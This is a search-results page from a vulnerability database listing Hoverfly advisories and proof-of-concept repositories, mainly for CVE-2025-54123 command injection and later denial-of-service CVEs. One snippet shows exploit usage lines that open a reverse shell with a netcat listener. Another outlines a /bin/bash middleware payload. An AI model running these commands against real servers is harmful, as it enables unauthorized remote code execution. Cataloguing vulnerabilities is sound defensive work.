Lucene search
+L

164 matches found

Kitploit
Kitploit
added 2026/09/15 4:16 p.m.12 views

hoverfly

Simulaciones de API para desarrollo y pruebas Hoverfly es una herramienta de simulación de API ligera y de código abierto. Con Hoverfly, puedes crear simulaciones realistas de las APIs de las que depende tu aplicación. Reemplaza dependencias de API lentas e inestables con simulaciones realistas y...

6AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/15 2:42 p.m.10 views

CVE-2025-54123-Poc

CVE-2025-54123 Exploit Hoverfly Authenticated Middleware Command Injection RCE | CVSS 9.8 CRITICAL Vulnerability Hoverfly = 1.11.3 is vulnerable to authenticated command injection through the /api/v2/hoverfly/middleware endpoint. Admin credentials are required, but once authenticated, the...

9.8CVSS8.1AI score0.10543EPSS
SaveExploits7
Nuclei
Nuclei
added 2026/09/15 5:39 a.m.183 views

Hoverfly < 1.10.3 - Arbitrary File Read

Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary...

7.5CVSS5.9AI score0.55574EPSS
SaveExploits3References2
Kitploit
Kitploit
added 2026/09/14 11:13 a.m.4 views

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

CVE-2025-54123 — Hoverfly Middleware API Remote Code Execution Authenticated RCE via OS Command Injection in Hoverfly ≤ 1.11.3 Vulnerability Overview...

9.8CVSS8.1AI score0.10543EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/13 10:24 p.m.3 views

devarea

DevArea — HackTheBox Platform: HackTheBox OS: Linux Status: Retired — full walkthrough published. Full walkthrough: l3dsec.com/walkthroughs/devarea-htb Attack Chain root@kitploit: nmap → 21 FTP anon + 80 + 8080 Jetty + 8888 Hoverfly → FTP anon → employee-service.jar Apache CXF, pre-3.5.5 →...

9.8CVSS0.10543EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/13 7:46 p.m.11 views

CVE-2025-54123

CVE-2025-54123 概要 HoverFly のミドルウェア API エンドポイントにおける、入力検証の不備と安全でないコマンド実行による認証済みリモートコード実行(RCE)。 攻撃フロー 1. 認証 攻撃者は有効な認証情報またはセッショントークンを使用して HoverFly に認証する /api/token-auth エンドポイント経由で Bearer トークンを取得する 2. 悪意のあるペイロードの作成 攻撃者は以下の内容を含む JSON ペイロードを構築する: binary: /bin/bash(ユーザー制御) script: 任意のシェルコマンド(例:...

9.8CVSS8.2AI score0.10543EPSS
SaveExploits7
NVD
NVD
added 2026/09/11 10:16 p.m.11 views

CVE-2026-50013

Hoverfly is an open source API simulation tool. Prior to version 1.12.8, when Hoverfly is running in Diff mode, the AddDiff function writes to the shared responsesDiff map without any synchronization no mutex. When multiple proxy requests are processed concurrently the normal case for any proxy,...

7.5CVSS0.00272EPSS
SaveExploits0References3
NVD
NVD
added 2026/09/11 10:16 p.m.11 views

CVE-2026-50018

Hoverfly is an open source API simulation tool. Prior to version 1.12.8, remote post-serve actions use http.DefaultClient without any timeout configuration. When the remote endpoint is unreachable or intentionally slow accepts TCP connection but never responds, each triggered proxy request spawns...

6.5CVSS0.00299EPSS
SaveExploits0References3
CVE
CVE
added 2026/09/11 9:28 p.m.36 views

CVE-2026-50018

Hoverfly (open source API simulation tool) prior to version 1.12.8 is vulnerable to denial of service via a goroutine leak in its remote post-serve actions . The root cause is the use of http.DefaultClient without any timeout configuration: when the remote endpoint is unreachable or intentionally...

6.5CVSS0.00299EPSS
SaveExploits0References3
OSV
OSV
added 2026/09/11 9:28 p.m.6 views

CVE-2026-50018 Hoverfly: Denial of Service via Goroutine Leak in Remote Post-Serve Actions

Hoverfly is an open source API simulation tool. Prior to version 1.12.8, remote post-serve actions use http.DefaultClient without any timeout configuration. When the remote endpoint is unreachable or intentionally slow accepts TCP connection but never responds, each triggered proxy request spawns...

6.5CVSS5.8AI score
SaveExploits0References5
Cvelist
Cvelist
added 2026/09/11 9:28 p.m.27 views

CVE-2026-50018 Hoverfly: Denial of Service via Goroutine Leak in Remote Post-Serve Actions

Hoverfly is an open source API simulation tool. Prior to version 1.12.8, remote post-serve actions use http.DefaultClient without any timeout configuration. When the remote endpoint is unreachable or intentionally slow accepts TCP connection but never responds, each triggered proxy request spawns...

6.5CVSS0.00299EPSS
SaveExploits0References3
Cvelist
Cvelist
added 2026/09/11 9:27 p.m.29 views

CVE-2026-50013 Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode

Hoverfly is an open source API simulation tool. Prior to version 1.12.8, when Hoverfly is running in Diff mode, the AddDiff function writes to the shared responsesDiff map without any synchronization no mutex. When multiple proxy requests are processed concurrently the normal case for any proxy,...

7.5CVSS0.00272EPSS
SaveExploits0References3
OSV
OSV
added 2026/09/11 9:27 p.m.6 views

CVE-2026-50013 Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode

Hoverfly is an open source API simulation tool. Prior to version 1.12.8, when Hoverfly is running in Diff mode, the AddDiff function writes to the shared responsesDiff map without any synchronization no mutex. When multiple proxy requests are processed concurrently the normal case for any proxy,...

7.5CVSS5.7AI score
SaveExploits0References5
CVE
CVE
added 2026/09/11 9:27 p.m.30 views

CVE-2026-50013

Hoverfly (an open-source API simulation/proxy tool by SpectoLabs) is affected by an unsynchronized concurrent map write in its Diff mode . Prior to version 1.12.8 , the AddDiff() function writes to the shared responsesDiff map without a mutex. Because Hoverfly processes proxy requests concurrentl...

7.5CVSS0.00272EPSS
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/10 5:16 p.m.10 views

CVE-2025-54123

CVE-2025-54123 Hoverfly CVE RCE Usage Command execution: root@kitploit: python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -c whoami Reverse Shell: root@kitploit: nc -lvnp 443 root@kitploit: python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -r $IP 443...

9.8CVSS8.2AI score0.10543EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/10 3:19 p.m.12 views

CVE-2025-54123

CVE-2025-54123 - Hoverfly Command Injection RCE PoC CVE-2025-54123 - Middleware Command Injection in Hoverfly 📌 CVE Details ID : CVE-2025-54123 Type : Command Injection / Remote Code Execution RCE Vendor : Hoverfly Impact : Allows authenticated attackers to execute arbitrary system commands via t...

9.8CVSS8.2AI score0.10543EPSS
SaveExploits7References1
Kitploit
Kitploit
added 2026/09/09 12:47 p.m.7 views

CVE-2025-54123

CVE-2025-54123 Hoverfly Command Injection to RCE PoC Overview This repository contains a Python proof-of-concept PoC script for interacting with Hoverfly instances affected by CVE-2025-54123. The script supports: Authentication using username/password credentials Authentication using an existing...

9.8CVSS8.2AI score0.10543EPSS
SaveExploits7
OSV
OSV
added 2026/07/17 7:42 p.m.12 views

GO-2026-5977 Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode in github.com/SpectoLabs/hoverfly

Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode in github.com/SpectoLabs/hoverfly...

7.5CVSS5.2AI score0.00272EPSS
SaveExploits0References3
OSV
OSV
added 2026/07/17 7:42 p.m.10 views

GO-2026-5975 Hoverfly: Denial of Service via Goroutine Leak in Remote Post-Serve Actions in github.com/SpectoLabs/hoverfly

Hoverfly: Denial of Service via Goroutine Leak in Remote Post-Serve Actions in github.com/SpectoLabs/hoverfly...

6.5CVSS5.3AI score0.00299EPSS
SaveExploits0References3
Veracode
Veracode
added 2026/07/15 9:35 a.m.18 views

Uncontrolled Resource Consumption

github.com/spectolabs/hoverfly is vulnerable to Uncontrolled Resource Consumption Denial of Service. The vulnerability is due to the use of http.DefaultClient without a configured timeout for remote post-serve actions, which allows an attacker to trigger requests to a non-responsive endpoint,...

6.1AI score0.00299EPSS
SaveExploits0References3Affected Software1
Rows per page
Query Builder